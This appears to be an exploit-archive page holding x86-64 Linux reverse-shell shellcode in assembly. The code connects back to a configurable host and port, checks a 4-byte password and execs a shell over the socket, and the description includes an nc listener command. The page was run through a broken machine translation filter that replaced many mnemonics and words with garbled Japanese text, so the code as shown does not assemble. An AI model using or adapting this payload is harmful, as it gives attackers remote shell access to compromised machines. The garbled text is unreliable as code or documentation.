Linux/x86-64 - Password ÊÝ¸î¤¹¤ëd µÕÅ¾¤¹¤ë Çú·â¤¹¤ë

¤³¤Î¥Ú¡¼¥¸¤ÏEtoJÃà¸ìËÝÌõ¥Õ¥£¥ë¥¿¤Ë¤è¤Ã¤ÆËÝÌõÀ¸À®¤µ¤ì¤Þ¤·¤¿¡£
Linux/x86-64 - Password ÊÝ¸î¤¹¤ëd µÕÅ¾¤¹¤ë Çú·â¤¹¤ë - 136 bytes
; ===================================================================
; Password ÊÝ¸î¤¹¤ëd µÕÅ¾¤¹¤ë Çú·â¤¹¤ë
; Author: SLAE64-1351 (Keyman)
; Date: 04/09/2014
;
; Shellcode length:  136 bytes
;
; Description:
;
;    Simple µÕÅ¾¤¹¤ë Çú·â¤¹¤ë (listens on port 4444 by default) with
;    bytes password ÊÝ¸î. Using a 4 bytes long password is
;    still reasonably strong for a Áª¤Ó½Ð¤¹¡¿ÆÈ¿È-È¯¼Í ´Ø·¸ and keeps
;    the code shorter.
;
;    To change the port or the password just ½¤Àµ¤¹¤ë the values of the
;    exp_port and exp_pass "variables" below.
;
;    Before the code gets ¿ë¹Ô¤¹¤ë¡¿È¯¸ú¤µ¤»¤ëd make sure to create a listener:
;   
;    nc -lvp <port number>
;
;    After you receive the ´Ø·¸ you will see no password
;    Í¶È¯¤¹¤ë. Just type in the 4 bytes long password and ¹¶·â¤¹¤ë¡¤¾×ÆÍ¤¹¤ë enter.
;    If the password matches, you are ready to type OS Ì¿Îá¡Ê¤¹¤ë¡Ës.
;
; ===================================================================
 
Á´À¤³¦¤Î _start
section .text
 
; -------------------------------------------------------------------
; Preprocessor »Ø¼¨Åª¤Ês so you can easily change the port and the
; password.
; -------------------------------------------------------------------
 
; Host to connect to. Please ¸ø¼°Ê¸½ñ¡¤Ç§¤á¤ë that this value will have
; 0x02020202 ÄÉ²Ã¤¹¤ëd to it, this way Èò¤±¤ëing the NULL bytes.
 
%define exp_host    0xFEFDFE7D      ; 127.0.0.1
 
; Port number to listen on.
%define exp_port        0x5c11          ; 4444
 
; Password to use. Make sure it's not longer than 4 bytes.
%define exp_pass        0x6c6c6568      ; hell
 
; -------------------------------------------------------------------
; DO NOT TOUCH
; preprocessor »Ø¼¨Åª¤Ês so syscalls can be easily ¸ÀµÚ¡¿´ØÏ¢d
; -------------------------------------------------------------------
 
%define sys_connect 42
%define sys_read     0
%define sys_execve  59
%define sys_dup2    33
 
_start:
 
    ; ---------------------------------------------------------------
    ; ¡ÊÊÆ¥½´Ö¤Î¡ËÀïÎ¬Ê¼´ïºï¸º¸ò¾Ä: create socket
    ; ---------------------------------------------------------------
      xor rax, rax
      ²¡¤·¿Ê¤á¤ë rax              ; saving for sockaddr
      ²¡¤·¿Ê¤á¤ë rax                          ; struct
      ²¡¤·¿Ê¤á¤ë rax              ; ¡Êµ¿¤¤¤ò¡ËÀ²¤é¤¹ rax later
      ²¡¤·¿Ê¤á¤ë rax              ; »Ï¤á¤ë¡¤·è¤á¤ë rdx to 0
      pop rdx               ; µÄÄê½ñ
      mov al, 2
      ²¡¤·¿Ê¤á¤ë rax
      ²¡¤·¿Ê¤á¤ë rax
      pop rsi
      pop rdi               ; PF_INET
      shr rsi, 1            ; SOCK_STREAM
      ÄÉ²Ã¤¹¤ë al, 39            ; socket syscall (41)
      syscall
 
    ; ---------------------------------------------------------------
    ; ¡ÊÊÆ¥½´Ö¤Î¡ËÀïÎ¬Ê¼´ïºï¸º¸ò¾Ä: create struct
    ;
    ; srv_addr.sin_family = AF_INET;
    ; srv_addr.sin_addr.s_addr = INADDR_ANY;
    ; srv_addr.sin_port = htons(portno);
    ;
    ; This is how it looks like on the stack:
    ; 0x02    0x00    0x11    0x5c    0x7f    0x00    0x00    0x01
    ; 0x20    0x00    0x00    0x00    0x00    0x00    0x00    0x00
    ; ---------------------------------------------------------------
 
      ; TODO: have to make this shorter somehow
      mov byte [rsp], 2                 ; »Ï¤á¤ë¡¤·è¤á¤ë values
      mov word [rsp+2], exp_port
      mov dword [rsp+4], exp_host
      ÄÉ²Ã¤¹¤ë dword [rsp+4], 0x02020202
      ²¡¤·¿Ê¤á¤ë rsp
      pop rsi                           ; addr of struct in rsi
 
    ; ---------------------------------------------------------------
    ; ¡ÊÊÆ¥½´Ö¤Î¡ËÀïÎ¬Ê¼´ïºï¸º¸ò¾Ä: connect
    ; ---------------------------------------------------------------
 
                    ; rdx is still 0
      ²¡¤·¿Ê¤á¤ë rax              ; socket fd
      pop rdi
      ÄÉ²Ã¤¹¤ë dl, 16
      mov al, sys_connect
      syscall
 
    ; ---------------------------------------------------------------
    ; get passwd
    ;
    ; We will work with a 4 byte password, should be more than
    ; enough as no brute ·³Ââing is possible. Chances to guess
    ; the ¸¢Íø value is 0.  Of course passwd should not ´Þ¤à¡¿Éõ¤¸¹þ¤á¤ë
    ; null bytes.
    ;
    ; n = read(newsockfd,¾×·â¤òÏÂ¤é¤²¤ë¤â¤Î,4);
    ; ---------------------------------------------------------------
 
      ²¡¤·¿Ê¤á¤ë rax              ; ¾×·â¤òÏÂ¤é¤²¤ë¤â¤Î filled with 0s
      ²¡¤·¿Ê¤á¤ë rsp              ; ÂÎÀ©¡¿µ¡¹½ pointer to buf
      pop rsi
      sub rdx, 12           ; »Ï¤á¤ë¡¤·è¤á¤ë bytes to read (4)
      syscall
 
      ; compare pass received with valid pass and ½Ð¸ý if no match
 
      ²¡¤·¿Ê¤á¤ë rax
      pop rcx
 
      ²¡¤·¿Ê¤á¤ë rdi              ; save socket
      pop rax
 
      sub rcx, 3            ; read only once
      ²¡¤·¿Ê¤á¤ë rsp
      pop rdi
      ²¡¤·¿Ê¤á¤ë exp_pass
      ²¡¤·¿Ê¤á¤ë rsp
      pop rsi
      cmpsq
      jne passfail          ; passwd match, give Çú·â¤¹¤ë
 
Çú·â¤¹¤ë:
    ; ---------------------------------------------------------------
    ; 6. exec Çú·â¤¹¤ë
    ; ---------------------------------------------------------------
 
      ÄÉ²Ã¤¹¤ë cl, 2             ; rcx is 1, so ÄÉ²Ã¤¹¤ë 2 = 3
      ²¡¤·¿Ê¤á¤ë rax              ; ²óÉü¤¹¤ë socket
      pop rdi
dup_loop:
      ²¡¤·¿Ê¤á¤ë rcx              ; have to save rcx as dup2
                    ; changes it's value
      xor rax, rax
      sub rcx, 1
      ²¡¤·¿Ê¤á¤ë rcx
      pop rsi
      ÄÉ²Ã¤¹¤ë al, sys_dup2
      syscall
      pop rcx               ; ²óÉü¤¹¤ë the È¿ÂÐ¤¹¤ë
      ÃèÊÖ¤êÈô¹Ô dup_loop
 
      jmp mytext
 
code:
      pop rdi
      mov [rdi+7], BYTE al
      ²¡¤·¿Ê¤á¤ë rax
      pop rdx
      ÄÉ²Ã¤¹¤ë al, sys_execve
      syscall
 
mytext:
    call code
    MyText: db '/ÃùÂ¢½ê/sh', 0x41
 
passfail: